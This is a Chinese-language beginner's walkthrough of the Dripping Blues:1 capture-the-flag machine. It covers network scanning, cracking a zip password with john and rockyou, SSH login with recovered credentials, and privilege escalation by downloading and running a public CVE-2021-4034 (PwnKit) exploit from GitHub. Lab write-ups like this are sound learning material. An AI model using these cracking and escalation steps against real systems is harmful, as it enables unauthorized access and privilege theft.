萌新的Dripping Blues:1试玩
一、启动环境(下载地址)
这个靶场竟然有图形化界面!?
打开kali
二、开始操作
nmap扫描
nmap 192.168.183.0/24
http访问
发现80端口打开,还有ftp和ssh,先访问一下80
漂移蓝再次被黑客入侵,所以现在被称为滴落蓝 :D 哈哈哈
来自
特拉维斯斯科特与暴徒
彳亍,目测没有更多信息了,信息收集一下
robots.txt
.txt文件可以直接访问,看一下
你好亲爱的黑客崇拜者,
去找这个歌词:
https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html
计算 n 个单词并将它们并排放置然后 md5sum 它
即,hellohellohellohello >> md5sum hellohellohellohello
这是ssh的密码
emmmm有一个外部网站,似乎计算出md5是ssh密码,先访问一下
什么东西。。。(研究了一会不会,查攻略也没查到)
ftp访问
发现一个压缩包,解压一下,发现需要密码
john破解压缩包
kali zip2john先破解一下respectmydrip.zip:
zip2john respectmydrip.zip > 1.hash
获得中间hash文件
john --wordlist=/usr/share/wordlists/rockyou.txt 1.hash
破解hash文件
得到密码
072528035
secret.zip好像破不出来,先放一边
查了查攻略,之前robots.txt里边的目录可以推测出有文件包含漏洞
得到一个密码,试了一下不是secret.zip的密码,可能是ssh的登录密码
ssh thugger@192.168.183.134
ssh登录->yes->输入密码
上来了,拿到第一条flag
提权
利用内核版本漏洞提权貌似不行,靶机上没有gcc,于是我又双叒叕查了查
ps -aux
查看正在运行的进程
找到这个(漏洞分析)
在github上找到这个软件的漏洞
wget https://github.com/nikaiw/CVE-2021-4034/archive/refs/heads/master.zip
在github上下载
unzip master.zip
下载好之后解压
cd CVE-2021-4034-master/
解压好之后进入目录
python3 cve2021-4034.py
执行python文件
(掉网了一次,下载解压的过程没了)